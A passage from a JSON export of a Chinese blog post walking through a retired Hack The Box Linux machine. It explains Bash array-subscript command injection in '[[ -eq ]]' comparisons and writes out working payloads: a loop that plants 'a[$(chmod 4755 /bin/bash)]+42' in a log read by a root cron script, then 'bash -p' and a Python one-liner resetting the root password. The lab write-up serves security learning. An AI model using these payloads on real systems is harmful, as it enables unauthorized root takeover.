0);\">\u76f8\u6bd4\u8f83\uff0c\u800c\u662f\u5c06\u4e00\u4e2a\u7531\u7528\u6237\u8f93\u5165\u6784\u5efa\u7684<\/span><code>Shell<\/code><span style=\"background-color: rgba(255, 255, 255, 0);\">\u5bf9\u8c61\u540c<\/span><code>42<\/code><span style=\"background-color: rgba(255, 255, 255, 0);\">\u76f8\u6bd4\u8f83\uff0c\u6240\u4ee5\u811a\u672c\u4f1a\u62a5\u9519\u3002\u5982\u679c\u6211\u4eec\u8f93\u5165\u7684\u662f\u5b57\u7b26\u4e32<\/span><code>test<\/code><span style=\"background-color: rgba(255, 255, 255, 0);\">\uff0c\u811a\u672c\u5c31\u4f1a\u6253\u5370<\/span><code>Wrong<\/code><span style=\"background-color: rgba(255, 255, 255, 0);\">\u9000\u51fa\uff0c\u800c\u4e0d\u662f\u62a5\u9519\u3002<\/span><\/p>\n<p><span style=\"background-color: rgba(255, 255, 255, 0);\">\u5728\u8fd9\u79cd\u60c5\u51b5\u4e0b\uff0c\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u501f\u52a9<\/span><code>Shell<\/code><strong><span style=\"background-color: rgba(255, 255, 255, 0);\">\u6570\u7ec4\u4e0b\u6807<\/span><\/strong><span style=\"background-color: rgba(255, 255, 255, 0);\">\u7684\u65b9\u5f0f\uff0c\u8fdb\u884c\u6267\u884c\u4efb\u610f\u547d\u4ee4\u7684\u64cd\u4f5c\u3002\u6bd4\u5982\uff0c\u6211\u4eec\u53ef\u4ee5\u8f93\u5165\u5982\u4e0b\u6570\u7ec4\u5143\u7d20\u5bf9\u8c61\uff1a<\/span><\/p>\n<pre><code class=\"language-plain\">a[$(screenfetch &gt;&amp;2)]+42<\/code><\/pre>\n<p>\u8fd9\u79cd\u60c5\u51b5\u4e0b\uff0c\u5b9e\u9645\u6267\u884c\u7684\u6bd4\u8f83\u8bed\u53e5\u5c31\u662f\uff1a<\/p>\n<pre><code class=\"language-bash\">if [[ a[$(screenfetch &gt;&amp;2)]+42 -eq 42 ]]<\/code><\/pre>\n<p>\u6b64\u65f6<code>a[$(id &gt;&amp;2)]+42<\/code>\u5c31\u662f\u4e00\u4e2a\u5408\u6cd5\u7684\u6570\u503c\u3002<code>Bash<\/code>\u89e3\u91ca\u5668\u4f1a\u5148\u6267\u884c<code>$()<\/code>\u547d\u4ee4\u66ff\u6362\u8fd0\u7b97\u7b26\u5185\u7684\u547d\u4ee4\u5f97\u5230\u6570\u7ec4\u4e0b\u6807\u503c\uff0c\u968f\u540e\u4f7f\u7528\u8be5\u4e0b\u6807\u503c\u8bbf\u95ee<code>a<\/code>\u6570\u7ec4\uff0c\u5c1d\u8bd5\u5f97\u5230\u5bf9\u5e94\u7684\u5143\u7d20\u3002\u7136\u800c\uff0c\u4e00\u65e6\u653b\u51fb\u8005\u6784\u9020\u7684\u547d\u4ee4\u5f97\u5230\u6267\u884c\uff0c\u8be5\u811a\u672c\u540e\u7eed\u7684\u7a0b\u5e8f\u64cd\u4f5c\u662f\u5426\u6b63\u5e38\uff0c\u90fd\u65e0\u5173\u7d27\u8981\u4e86\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746162661162-258f7c3c-aed1-4736-8693-6aa7df7d670c.png\" alt=\"\" \/><\/p>\n<p>\u56de\u5230\u9776\u673a\u7684\u5b9a\u65f6\u811a\u672c\uff0c\u9274\u4e8e<code>analyze_http_statuses()<\/code>\u65b9\u6cd5\u53ea\u4f1a\u63d0\u53d6<code>HTTP Status:<\/code>\u540e\u7684\u5185\u5bb9\u8fdb\u884c\u6bd4\u8f83\u64cd\u4f5c\uff0c\u90a3\u4e48\u53ea\u9700\u8981\u4f7f\u7528<code>while<\/code>\u8bed\u53e5\u5faa\u73af\u5220\u9664\u5e76\u521b\u5efa\u65e5\u5fd7\u6587\u4ef6\uff0c\u5c31\u53ef\u4ee5\u89e6\u53d1\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\u4e86\uff0c\u65e5\u5fd7\u6587\u4ef6\u5185\u5bb9\u53ea\u9700\u5982\u4e0b\u5373\u53ef\uff1a<\/p>\n<pre><code class=\"language-plain\">HTTP Status: a[$(chmod 4755 \/bin\/bash &gt;&amp;2)]+42<\/code><\/pre>\n<p>\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528\u5982\u4e0b\u547d\u4ee4\u5faa\u73af\u5220\u9664\u5e76\u5199\u5165\u65e5\u5fd7\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-shell\">while true; do rm -rf \/var\/www\/web\/cloud-gateway\/log\/application.log; echo \"HTTP Status: a[$(chmod 4755 \/bin\/bash &gt;&amp;2)]+42\" &gt; \/var\/www\/web\/cloud-gateway\/log\/application.log; done;<\/code><\/pre>\n<p>\u7b49\u5f85\u4e00\u4f1a\u513f\u540e\uff0c\u505c\u6b62\u6267\u884c\u547d\u4ee4\uff0c\u67e5\u770b<code>\/bin\/bash<\/code>\u6743\u9650\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746163755746-20e3aa0c-8f1c-476d-8deb-f2797ca783c2.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u6267\u884c<code>chmod<\/code>\u547d\u4ee4\uff01\u73b0\u5728\u6267\u884c\u5982\u4e0b\u547d\u4ee4\u4fee\u6539<code>root<\/code>\u5bc6\u7801\uff1a<\/p>\n<pre><code class=\"language-shell\">\/bin\/bash -p\npython3 -c \"import os;os.setuid(0);os.setgid(0);os.system(\"echo 'Asd310056nAsd310056' | passwd root\")\"<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746164003488-1a9b2849-a31b-49c7-b9ab-47234fa219ec.png\" alt=\"\" \/><\/p>\n<p><strong>\u63d0\u6743\u6210\u529f\uff01\uff01\uff01\uff01<\/strong><\/p>\n<hr \/>\n<h1>\u672c\u6b21\u9776\u673a\u6e17\u900f\u5230\u6b64\u7ed3\u675f<\/h1>\n<hr \/>\n","protected":false},"excerpt":{"rendered":"<p>\u76ee\u6807\u4fe1\u606f IP\u5730\u5740\uff1a10.10.11.66\uff08\u5b58\u5728\u591a\u4e2aIP\u5730\u5740\uff09 \u4fe1\u606f\u6536\u96c6 ICMP\u68c0\u6d4b PING 10.129.103.58 (1 &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[3,14],"tags":[],"class_list":["post-259","post","type-post","status-publish","format-standard","hentry","category-htb_retired","category-linux_machines"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/259","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=259"}],"version-history":[{"count":8,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/259\/revisions"}],"predecessor-version":[{"id":267,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/259\/revisions\/267"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=259"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=259"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=259"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}